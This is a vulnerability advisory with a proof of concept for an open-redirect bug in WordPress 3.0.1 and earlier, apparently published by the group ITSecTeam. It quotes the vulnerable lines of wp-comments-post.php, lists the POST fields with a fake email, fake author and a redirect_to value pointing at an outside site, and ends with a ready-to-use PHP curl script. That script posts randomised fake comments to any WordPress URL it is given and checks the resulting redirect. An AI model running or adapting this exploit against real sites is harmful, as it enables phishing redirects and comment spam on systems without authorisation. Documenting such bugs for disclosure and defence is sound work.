#Title: WordPress (Version 3.0.1 And Prior) Url Redirection Bug #Vendor: http://wordpress.org/download/ ###################################################################### #AUTHOR: ITSecTeam #Email: Bug@ITSecTeam.com #Website: http://www.itsecteam.com #Forum : http://forum.ITSecTeam.com #Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability65.htm #Thanks: Amin Shokohi(Pejvak),M3hr@n$,r3dm0v3,am!rkh@n Particular Hookah(Dosib) :D ###################################################################### Poc : line 94-98 wordpress/wp-comments-post.php $location = empty($_POST['redirect_to']) ? get_comment_link($comment_id) : $_POST['redirect_to'] . '#comment-' . $comment_id; *Varible $location equal $_POST['redirect_to']* $location = apply_filters('comment_post_redirect', $location, $comment); *Function Redirect Wordpress* wp_redirect($location); *Redirect To Varible $location* ###################################################################### Poc 2 : Usage This Bug Worked In Request Post Post : comment_post_ID=1 //Post Id If Is Wrong Buf Not Worked email=emal@yahoo.com //Fake Email Address author=pejipeji //Fake Author Name comment=Hi //Fake Comment redirect_to=http://www.itsecteam.com //Url Adddress For Redirect ###################################################################### *Note : if post_ID Wrong Bug Not Worked ###################################################################### #Bug : http://localhost/wordpress/wp-comments-post.php ###################################################################### Exploit For Test :
Wordpress Vulnerability Url Redirection Test
ItSecTeam.com
Url :
"; if($_POST['url']){ $ch = curl_init($_POST['url']."/wp-comments-post.php"); curl_setopt($ch, CURLOPT_POSTFIELDS, "comment_post_ID=1&email=pejipeji".rand(1,9999)."@yahoo.com&author=pejipeji".rand(1,9999)."&comment=Hi".rand(1,9999)."&redirect_to=http://www.itsecteam.com"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($ch); $info=null; $info =curl_getinfo($ch); echo $info['url']; } ?>